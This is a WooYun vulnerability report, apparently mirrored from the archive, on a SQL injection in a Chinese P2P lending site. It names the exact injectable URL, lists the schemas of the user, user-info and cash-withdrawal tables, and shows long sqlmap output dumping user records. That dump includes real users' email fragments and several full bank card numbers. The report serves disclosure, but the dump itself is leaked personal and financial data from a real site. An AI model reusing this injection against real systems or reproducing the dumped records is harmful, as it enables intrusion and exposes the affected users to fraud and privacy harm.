乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-12: 厂商已经主动忽略漏洞,细节向公众公开
泄露上万数据
注入点:https://www.shandianjr.com/sdmall/detail?itemId=8a2b5b7d4e8d302c014e8da3bf7500ae
Database: p2p_sddTable: p2p_user[55 columns]+-------------------+---------------+| Column | Type |+-------------------+---------------+| accountType | int(11) || address | varchar(200) || appLoginStatus | int(11) || brokerId | varchar(32) || brokerRate | decimal(10,8) || brokerStatus | int(11) || busiCode | varchar(30) || cardno | varchar(22) || cardnoStatus | int(11) || createBy | varchar(32) || createTime | datetime || deleteTime | datetime || disposeRemark | varchar(1000) || disposeStatus | int(11) || email | varchar(80) || emailStatus | int(11) || guarType | varchar(2) || hfUserId | varchar(50) || id | varchar(32) || idcard | varchar(18) || idCardBeginDate | bigint(20) || idCardEndDate | bigint(20) || idCardPeriodType | int(11) || idcardStatus | int(11) || inBlackList | tinyint(1) || invitationCode | varchar(6) || InvitationMobile | varchar(22) || isDeleted | tinyint(1) || lastloginip | varchar(30) || lastlogintime | bigint(20) || logins | int(11) || mobile | varchar(22) || mobileStatus | int(11) || modify | int(11) || nickname | varchar(40) || p2pAccount_id | varchar(32) || p2pUserAccount_id | varchar(32) || p2pUserInfo_id | varchar(32) || p2pUserPoint_id | varchar(32) || password | varchar(64) || paypassword | varchar(64) || pointGetTime | bigint(20) || registerip | varchar(30) || registertime | bigint(20) || solt | varchar(10) || telephone | varchar(22) || truename | varchar(40) || updateBy | varchar(32) || updateTime | datetime || userLevel | int(11) || username | varchar(25) || usrCustId | varchar(40) || usrMp | varchar(40) || version | int(11) || virtualStatus | int(11) |+-------------------+---------------+
Database: p2p_sddTable: p2p_user_info[22 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| address | varchar(255) || area | varchar(255) || birthday | bigint(20) || city | varchar(255) || createBy | varchar(32) || createTime | datetime || deleteTime | datetime || ecpName | varchar(255) || ecpRelation | int(11) || ecpTelephone | varchar(255) || id | varchar(32) || isDeleted | tinyint(1) || mobile | varchar(255) || mobile1 | varchar(255) || mobile2 | varchar(255) || msn | varchar(255) || province | varchar(255) || qq | varchar(255) || telephone | varchar(255) || updateBy | varchar(32) || updateTime | datetime || version | int(11) |+--------------+--------------+
Database: p2p_sddTable: p2p_account_cash[25 columns]+-------------------+---------------+| Column | Type |+-------------------+---------------+| amount | decimal(19,2) || bank | varchar(150) || branch | varchar(150) || cardno | varchar(22) || collected | decimal(19,2) || createBy | varchar(32) || createTime | datetime || dealno | varchar(50) || deleteTime | datetime || fee | decimal(19,2) || id | varchar(32) || ip | varchar(64) || isDeleted | tinyint(1) || p2pAccountBank_id | varchar(32) || p2pOrder_id | varchar(32) || p2pUser_id | varchar(32) || resultCode | varchar(60) || servFee | decimal(19,2) || status | int(11) || updateBy | varchar(32) || updateTime | datetime || varifyRemark | varchar(150) || varifyTime | bigint(20) || verifyManger | varchar(50) || version | int(11) |+-------------------+---------------+
可dump:(展示部分数据)
[14:27:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0[14:27:33] [INFO] fetching entries of column(s) 'address, cardno, createTime, email, id, mobile, p2pAccount_id, password, paypassword, telephone, truename, username' for table 'p2p_user' in database 'p2p_sdd'[14:27:33] [INFO] retrieved: " "," ","2015-03-27 16:40:56","101","101","101",...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","machunyu870221@ms...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:36] [INFO] retrieved: " ","622909346304873318","2015-03-27 16:40:56","...[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","102","102","102",...[14:27:36] [INFO] retrieved: " ","6228480470739286610","2015-03-27 16:40:56",...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","103","103","103",...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wang_doris3561@si...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","104","104","104",...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","105","105","105",...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","106","106","106",...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:47] [INFO] retrieved: " ","6222023100037069205","2015-03-27 16:40:56",...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","107","107","107",...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:51] [INFO] retrieved: " ","6217002390000517497","2015-03-27 16:40:56",...[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:51] [INFO] retrieved: " ","6215593100001469450","2015-03-27 16:40:56",...[14:27:51] [INFO] retrieved: " ","6214850230403088","2015-03-27 16:40:56","73...[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","zhangxuelovegang@...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","108","108","108",...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","www.470654506@qq....[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...[14:27:55] [INFO] retrieved: " "," ","2015-03-27 16:40:56","109","109","109",...[14:27:55] [INFO] retrieved: " ","6214830232822972","2015-03-27 16:40:56","95...
公司发展ing,漏洞要赶紧补
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)